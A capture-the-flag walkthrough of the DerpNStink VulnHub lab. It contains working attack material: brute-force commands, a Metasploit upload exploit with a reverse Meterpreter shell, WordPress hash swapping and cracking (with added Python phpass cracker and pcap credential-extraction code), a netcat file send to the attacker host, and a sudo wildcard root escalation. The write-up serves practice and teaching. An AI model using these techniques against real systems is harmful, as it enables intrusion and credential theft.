Vulnhub DerpNStink: 1 walkthrough

This is my first write-up of a VulnHub image, and the image is DerpNStink: 1.
I know this is a really famous machine, so why bother with yet another write-up when hundreds already exist?
The reason is that I wanted to try it and see whether my methodology and approach are similar to those of more experienced researchers. This is one of the first machines I tried.
This write-up is also really verbose (-vV) because I am not only interested in the flags but also in the mindset I have to acquire, so feel free to leave a comment if you believe I'm getting something wrong.


Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…

As usual I fire up Kali Linux and the DerpNStink VM in VirtualBox and start with the first information-gathering scans.

First things first, I run netdiscover to find all the devices on my home network.

netdiscover -r

So we have the IP of the derpnstink box!

Next I run nmap to find open ports and identify the services running on them.

nmap -sV -T4 -O -F --version-light

So 3 services are running, on ports 21, 22 and 80 (keep in mind that -F only probes the 100 most common ports; a full -p- sweep is the safer habit).
Really common services (FTP, SSH and HTTP), with HTTP being the most interesting because it will probably host a web application.

FTP is running vsftpd 3.0.2 (Sep 2012), slightly outdated; the latest release at the time was 3.0.3 (Jul 2015).

Searchsploit returned a few exploits for vsftpd, but only for older versions (2.x.x).

So, nothing really fancy is going to happen here. We could try to brute-force the service, but let's leave that for now as a worst-case scenario.

I also tried to connect as the anonymous user with the Metasploit auxiliary module (auxiliary/scanner/ftp/anonymous), with no luck.

Now let's focus on the SSH service.
The version that is running (OpenSSH 6.6.1p1) is not vulnerable to any public exploits.
Again nothing interesting here, and we won't try to brute-force it (I hope).
If we try to connect with SSH we get "Permission denied (publickey)", which tells us that password authentication is disabled and only key-based logins are accepted.

ssh root@

Moving on to the most interesting part, HTTP on port 80.

Let's start with Knockpy, a Python sub-domain scanner that, again, works from a common sub-domain wordlist.

No luck here: no sub-domains found.

Nikto will help us get a better idea about the web server and the web apps hosted on it.

nikto -h

Let's continue with Dirb, one of my favorite tools, which scans for common sub-directories based on a wordlist.
(The -r parameter tells dirb not to recurse: we don't want to get lost scanning every folder that might exist for hours. For now we are only interested in top-level directories.)

dirb -r

Really interesting stuff here.

Let's also run the directory scanner auxiliary module from Metasploit, which does the same job, in case Dirb missed something.

use auxiliary/scanner/http/dir_scanner

Actually Dirb did the better job here, because the auxiliary scanner missed a few files and directories.

So, let's finally open the site in the web browser.

An image of Mr. Derp and Uncle Stinky. No login, nothing interesting other than the cool visuals.

Let's view the page source.

Opening it gives us useful information about system users, web directories and a local domain.

Opening it is even more interesting, as it gives us a hint!

<!-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->

So we add a line for derpnstink.local, pointing at the box's IP, to our /etc/hosts.

Scrolling further down in the source code of the home page we find our first flag!
Well, that was easy. 4 to go. robots.txt is usually really informative because it lists the paths a site wants to hide from search engines (which only matters to crawlers that actually honour robots.txt files).

Anyway, dead end. Both /php/ and /temporary/ return nothing useful.

Browsing the rest of the dirb results is also a dead end.
/weblog/ … on the other hand opens a new page!

CaniHazURMoneyPlz!! lol

It is clearly a WordPress blog. Interesting.

http://derpnstink.local/weblog/wp-admin/ loads fine. That is convenient for us, not for derp though.

So it is time to use WPScan.
WPScan is a black-box WordPress vulnerability scanner that can be used to scan remote WordPress installations for security issues.

These are the enumeration options we are currently interested in.

--enumerate | -e [option(s)]        Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    vp       only vulnerable plugins
    ap       all plugins (can take a long time)
    tt       timthumbs
    t        themes
    vt       only vulnerable themes
    at       all themes (can take a long time)
    cb       Config backups
    dbe      Database exports
  Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
  If no option is supplied, the default is "vt,tt,u,vp"

We will try to enumerate vulnerable plugins, vulnerable themes, users, the infamous timthumb vulnerability, and also config backups and DB exports.

wpscan --url http://derpnstink.local/weblog -e vt,tt,u,vp,cb,dbe

WPScan returned some naaasty stuff about this WordPress installation:

        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.1
          Sponsored by Sucuri
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

[+] URL: http://derpnstink.local/weblog/
[+] Started: Fri Jan  4 14:19:12 2019

Interesting Finding(s):

[+] http://derpnstink.local/weblog/
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://derpnstink.local/weblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence

[+] http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.6.13 identified (Latest, released on 2018-12-13).
 | Detected By: Emoji Settings (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.13'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.13'

[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2018-12-19T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 1.7
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.13
 | Style Name: Twenty Sixteen
 | Style URI:
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI:
 | Detected By: Css Style (Passive Detection)
 | Version: 1.3 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.13, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins
[+] Checking Plugin Versions

[i] Plugin(s) Identified:

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2018-11-15T11:14:00.000Z
 | [!] The version is out of date, the latest version is 1.6.9
 | Detected By: Urls In Homepage (Passive Detection)
 | [!] 4 vulnerabilities identified:
 | [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
 |     Fixed in: 1.4.7
 | [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
 |     Fixed in:
 | [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.5
 | [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.6
 | Version: 1.4.6 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt

[+] Enumerating Vulnerable Themes
 Checking Known Locations - Time: 00:00:01 <=====================================================================> (288 / 288) 100.00% Time: 00:00:01
[+] Checking Theme Versions

[i] No themes Found.

[+] Enumerating Timthumbs
 Checking Known Locations - Time: 00:00:12 <===================================================================> (2573 / 2573) 100.00% Time: 00:00:12

[i] No Timthumbs Found.

[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:00 <========================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports
 Checking DB Exports - Time: 00:00:00 <============================================================================> (36 / 36) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] unclestinky
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Finished: Fri Jan  4 14:19:46 2019
[+] Requests Done: 2921
[+] Cached Requests: 55
[+] Data Sent: 670.18 KB
[+] Data Received: 1.375 MB
[+] Memory used: 83.152 MB
[+] Elapsed time: 00:00:34

The PHP version (5.5.9) is end-of-life and has a few interesting CVEs, but for now let's focus on the WordPress stuff.
WordPress 4.6.13 is from the old 4.6 branch, but it carries the security backports (WPScan even marks it as latest), so nothing directly exploitable there.

WPScan found one outdated plugin, slideshow-gallery 1.4.6, with 4 known vulnerabilities!

The first, Slideshow Gallery < 1.4.7 Arbitrary File Upload, has a Metasploit module with an Excellent rank. Awesome!!

The WordPress Slideshow Gallery plugin contains an authenticated file upload vulnerability: an attacker can upload arbitrary files to the upload folder, and since the plugin uses its own file upload mechanism instead of the WordPress API, any file type goes through, PHP included.

The bad thing is that the exploit requires an authenticated user. Let's see if we can register a low-privileged user at http://derpnstink.local/weblog/wp-login.php?action=register. Aaand nope! User registration is disabled.

WPScan has already found two users (unclestinky, admin), so let's try common passwords against them.

So let's brute-force them.

But we need a wordlist.
Thankfully Kali ships a few decent wordlists under /usr/share/wordlists.
I like rockyou.txt.gz, so let's unzip it:

gunzip rockyou.txt.gz
wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/rockyou.txt --max-threads 25

Well, rockyou.txt is probably overkill here.
With over 14 million candidates per user, WPScan can't even estimate the time needed to exhaust the list (and every guess is a full HTTP request to wp-login.php, so it is also very noisy on the server side).

Let's try a smaller one.

wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/fasttrack.txt

Aaand success! That was crazy-easy. We could have guessed it manually, actually.

Let's log in to WordPress with username: admin password: admin

Nothing useful other than the vulnerable plugin. Many options in the WordPress menu were hidden even though we were logged in as "admin", and trying to view other pages like wp-admin/options-general.php returns the error "Sorry, you are not allowed to access this page." Something is off here: the account is named admin, but it clearly does not hold the administrator role (that page needs the manage_options capability).

WPScan found another user, "unclestinky", but didn't crack its password.
Let's try to log in to WordPress with username: unclestinky password: unclestinky
Wrong password.

Let's use the admin user for the Metasploit exploit.

use exploit/unix/webapp/wp_slideshowgallery_upload
set TARGETURI /weblog
set WP_USER admin
set WP_PASSWORD admin
check – The target appears to be vulnerable.


msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
[*] Started reverse TCP handler on 
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file xtgeaywf.php
[*] Sending stage (38247 bytes) to
[*] Meterpreter session 2 opened ( -> at 2019-01-05 13:55:17 -0500
[+] Deleted xtgeaywf.php

So we got a Meterpreter shell pretty easily, running as user www-data.

meterpreter > sysinfo
Computer    : DeRPnStiNK
OS          : Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686
Meterpreter : php/linux

Listing the current directory with ls shows a strange file named elidumfy.php that contains a payload from another user who tried to hack derpnstink! lol

meterpreter > ls
Listing: /var/www/html/weblog/wp-content/uploads/slideshow-gallery

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   4096    dir   2017-11-12 22:43:29 -0500  cache
100644/rw-r--r--  108987  fil   2017-11-12 22:45:12 -0500  derp.png
100644/rw-r--r--  1114    fil   2017-12-12 16:44:11 -0500  elidumfy.php

We continue browsing the directories with Meterpreter.
Opening wp-config.php (with Meterpreter's edit, or simply cat) gives us the credentials needed to connect to the database.

Outside the /weblog directory we visit the directories dirb found at the beginning that returned a 403.

Opening info.php in /var/www/html/php reveals interesting stuff:

meterpreter > ls
Listing: /var/www/html/php

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  72    fil   2018-01-09 12:33:24 -0500  info.php

We could do some nasty stuff with Meterpreter, but for now let's focus on phpMyAdmin.

After a successful login with username: root password: mysql we can view all the databases.
Searching information_schema for the string "flag" pointed at the wordpress database.

Searching that database for "flag" returned the 2nd flag of the machine, in the wp_posts table.
2 to go

Let's view the registered users in the wp_users table.

It would be nice to log in to WordPress as "unclestinky", but cracking a WordPress hash (phpass: salted, iterated MD5) didn't look quick, so why not just overwrite it with the hash of the "admin" user, whose password we already know is "admin". Before we do that, let's keep a backup of the original hash; we will need it later.

And now we can easily log in with username: unclestinky password: admin

Nothing interesting there though.
Back to meterpreter shell and browsing the filesystem

edit /etc/passwd

shows two real users, mrderp and stinky, both with /bin/bash as their shell.

Moving on to the home directories /home/stinky and /home/mrderp: trying to list them returns a permission error, since our shell runs as www-data.

At that point I must admit that I was kinda lost.
I am still a real novice at this, especially with the Linux filesystem and where to look for interesting things or flags.
I still have 2 flags to go and I am sure the /home directories are full of secrets.

So, ports 21, 22 and 80. I had some fun with port 80, but 21 and 22 are still really quiet.
Usernames found so far: admin and unclestinky (WordPress), mrderp and stinky (system).
Tried manually to log in with SSH, but password logins are disabled. Also tried guessing FTP passwords, with no luck.
Lost valuable time.

It is time to crack the WordPress hash of unclestinky (the one we backed up) and hope that he reuses the password on SSH or FTP.

john --wordlist=/usr/share/wordlists/rockyou.txt unclestinky_wp_hash.txt

(john recognises the $P$ prefix as the phpass format on its own; if it picks the wrong format, add --format=phpass.)

And we finally have the password! wedgie57

The WordPress username was "unclestinky", but we know from the /etc/passwd listing earlier that the Linux username is "stinky".
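What john is doing above, and what the hash swap in wp_users relied on, is the phpass "portable" scheme WordPress stores in user_pass: "$P$", one cost character, an 8-character salt, then 2^cost rounds of MD5. The following is an added example (not the author's code and not WordPress's): it re-implements that scheme so you can both crack a $P$ hash with a wordlist and generate a fresh one for a password of your own choosing instead of copying admin's. The hash it cracks is constructed in-block from a made-up salt ("abcdefgh"); it is not the real unclestinky hash from the machine, and the tiny wordlist stands in for rockyou.txt.

```python
"""Dictionary attack on, and generation of, WordPress phpass portable hashes.
Added example, not the author's code. DEMO_HASH and SMALL_WORDLIST are
constructed in-block (made-up salt, made-up wordlist)."""
import hashlib
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): 3 bytes -> 4 chars, LSB first."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Portable phpass hash of `password` under `setting`.

    `setting` is the first 12 characters of a stored hash: "$P$" (or "$H$"),
    one cost character (2**log2 MD5 rounds; WordPress uses "B" = 8192) and an
    8-character salt. A full stored hash works too, only [:12] is used.
    """
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a portable phpass hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("unsupported cost character")
    salt = setting[4:12].encode("latin-1")
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):   # the only slowdown phpass has
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_check(password: str, stored: str) -> bool:
    """True if `password` hashes to `stored` (salt and cost come from `stored`)."""
    return phpass_crypt(password, stored) == stored


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """First candidate whose hash matches `stored`, or None: the john loop."""
    for word in candidates:
        if phpass_check(word, stored):
            return word
    return None


# Constructed demo: the password the post recovered, under a made-up salt.
DEMO_HASH = phpass_crypt("wedgie57", "$P$Babcdefgh")
# Constructed stand-in for a wordlist (rockyou.txt has over 14M lines).
SMALL_WORDLIST = ["password", "admin", "unclestinky", "derp", "wedgie57", "letmein"]

if __name__ == "__main__":
    print(DEMO_HASH)
    print("cracked:", crack(DEMO_HASH, SMALL_WORDLIST))
```

Each guess costs 8193 MD5 calls and nothing else, which is why john chews through rockyou offline in minutes while the online WPScan brute force needed one HTTP request per guess: once you have the hash, the hash is the better target. To set your own password on an account, write phpass_crypt(new_password, "$P$B" + eight_random_itoa64_chars) into user_pass; WordPress 4.6 verifies it with exactly this algorithm.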

And we have successfully connected via FTP as "stinky" (password reuse, as hoped).

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Nov 12  2017 network-logs
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ssh
-rwxr-xr-x    1 0        0              17 Nov 12  2017 test.txt
drwxr-xr-x    2 0        0            4096 Nov 12  2017 tmp
226 Directory send OK.

Switching to the browser for easier browsing.

In the network-logs directory there is a file with a few chat logs between stinky and derp.
"12:07 stinky: im gonna packet capture so we can figure out whats going on"
Stinky mentions a packet capture, so we should keep that in mind as a hint.
We will probably have to analyze a .pcap file.

Not so well hidden in the ssh directory, luckily for us, we find a private RSA key.


We save the key to a file (key.txt), restrict its permissions (ssh refuses a key that is group- or world-readable) and then log in with it.

chmod 600 key.txt
ssh -i key.txt stinky@derpnstink.local

And we are in as stinky.

We browse the directories.

And we got the 3rd flag!

Also, in the Documents folder a derpissues.pcap is waiting to be wiresharked!

I didn't know how to get it to my local machine. I tried to move it to the /var/www dir to download it over HTTP, but I didn't have the right permissions.
So after googling I found a solution using netcat. (Since we already have SSH access with the key, scp -i key.txt stinky@derpnstink.local:Documents/derpissues.pcap . would have done it in one step.)

We listen on port 31337 on Kali for the file derpissues.pcap:

nc -l -p 31337 > derpissues.pcap

And from the box we send it as a gift from derp (<kali-ip> being the attacking machine's address):

nc <kali-ip> 31337 < derpissues.pcap

Compare sha256sum on both ends before trusting the copy; a netcat transfer gives no feedback if it gets cut short.

We are probably interested in HTTP POST requests to wp-login.php, so we filter the packets accordingly (http.request.method == "POST" && http.request.uri contains "wp-login.php").

Luckily for us the site is not using TLS, so passwords are sent in plain text.
The first matching POST is no use, because it carries a password we already know.

The next one gives us the password for derp!
username: mrderp
password: derpderpderpderpderpderpderp
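The Wireshark filter above does three things: pick TCP segments carrying HTTP, keep the POSTs whose request line targets wp-login.php, and show the form body where WordPress puts the credentials in the log and pwd fields. As an added example (not the author's code, and not a replacement for Wireshark), the block below does the same with only the standard library: it builds a small constructed pcap inline, with hypothetical 192.168.56.x addresses and a login POST mirroring the one found in the capture, so it runs without derpissues.pcap, and then walks the file to pull out every wp-login.php credential pair.

```python
"""Extract WordPress login credentials from a classic libpcap file.
Added example, not the author's code. SAMPLE_PCAP is constructed in-block
(hypothetical addresses, checksums left at zero); real captures may split one
HTTP request over several TCP segments, which this parser does not reassemble."""
import struct
from urllib.parse import parse_qs

# --- constructed sample capture ------------------------------------------
_BODY = b"log=mrderp&pwd=derpderpderpderpderpderpderp&wp-submit=Log+In&testcookie=1"
_LOGIN_POST = (b"POST /weblog/wp-login.php HTTP/1.1\r\n"
               b"Host: derpnstink.local\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n"
               b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n\r\n" + _BODY)


def _tcp_frame(payload: bytes, src_ip: str, dst_ip: str, dport: int) -> bytes:
    """Ethernet + IPv4 + TCP headers around `payload` (no options, zero checksums)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                         bytes(map(int, src_ip.split("."))),
                         bytes(map(int, dst_ip.split("."))))
    tcp_hdr = struct.pack("!HHIIBBHHH", 40000, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    eth_hdr = b"\x00" * 12 + b"\x08\x00"          # dst MAC, src MAC, EtherType IPv4
    return eth_hdr + ip_hdr + tcp_hdr + payload


def build_pcap(frames) -> bytes:
    """Classic pcap: 24-byte global header (linktype 1 = Ethernet), 16 bytes per record."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_500_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


SAMPLE_PCAP = build_pcap([
    _tcp_frame(b"GET /weblog/ HTTP/1.1\r\nHost: derpnstink.local\r\n\r\n",
               "192.168.56.101", "192.168.56.102", 80),
    _tcp_frame(_LOGIN_POST, "192.168.56.101", "192.168.56.102", 80),
])


# --- parser ----------------------------------------------------------------
def iter_tcp_payloads(pcap: bytes):
    """Yield (src_ip, dst_ip, dst_port, payload) for every IPv4/TCP segment."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}[magic]   # nanosecond variants not handled
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", pcap, off)
        frame = pcap[off + 16: off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # not IPv4
            continue
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:                                   # not TCP
            continue
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:]
        dport = struct.unpack_from("!H", tcp, 2)[0]
        data_off = (tcp[12] >> 4) * 4
        yield src, dst, dport, tcp[data_off:]


def extract_wp_logins(pcap: bytes):
    """Return [(src_ip, username, password)] for each POST to wp-login.php."""
    found = []
    for src, _dst, _port, payload in iter_tcp_payloads(pcap):
        request_line = payload.split(b"\r\n", 1)[0]
        if not payload.startswith(b"POST ") or b"wp-login.php" not in request_line:
            continue
        _head, _, body = payload.partition(b"\r\n\r\n")
        fields = parse_qs(body.decode("latin-1"))
        if "log" in fields and "pwd" in fields:
            found.append((src, fields["log"][0], fields["pwd"][0]))
    return found


if __name__ == "__main__":
    for src, user, pwd in extract_wp_logins(SAMPLE_PCAP):
        print(f"{src} -> {user}:{pwd}")
```

On the real file the one-liner equivalent is tshark -r derpissues.pcap -Y 'http.request.method == "POST" && http.request.uri contains "wp-login.php"' -T fields -e ip.src -e http.file_data, and tshark does reassemble segmented requests for you. The lesson for the defender side is the same one the chat log hinted at: a capture of a plain-HTTP admin login is a credential dump.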

ssh mrderp@derpnstink.local

And we are in!

Browsing the directories for flag4.

The file /home/mrderp/Desktop/helpdesk.log contains a support ticket with a lot of text and a pastebin link; what it all boils down to is this sudoers rule:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

So I had to google A LOT to find out what that means.

Long story short: mrderp may run, via sudo and as any user (root included), any command whose path matches /home/mrderp/binaries/derpy*, i.e. any file in that directory whose name starts with "derpy". Since mrderp owns his home directory, he can create such a file with whatever contents he likes, so the rule is a root shell in disguise. (sudo -l would have listed the same rule without the pastebin detour.)

Let's create a script named derpy.sh that just spawns an interactive bash, and run it through sudo:

mkdir -p /home/mrderp/binaries
printf '#!/bin/bash\nbash -i\n' > /home/mrderp/binaries/derpy.sh
chmod +x /home/mrderp/binaries/derpy.sh
sudo /home/mrderp/binaries/derpy.sh

And we are root!

The last flag was in /root/Desktop/flag.txt


mrDerp and UncleStinky got rooted.

Don't forget to change /var/www/html/temporary/index.html from "try harder!" to "I tried harder!!!"

So this was really fun and I learned a lot of new things.

Multiple vulnerabilities were found and chained (an outdated plugin, a guessable WordPress password, database credentials in a config file, password reuse between WordPress and FTP, a private key left on an FTP share, plain-HTTP logins captured in a pcap, and a wildcard sudo rule) in order to finally gain root access.
I must say that although it was kinda challenging for me, this situation is far from any real-world scenario. Still, it was good practice to sharpen my skills, and I hope I can deal with more advanced machines in the near future.
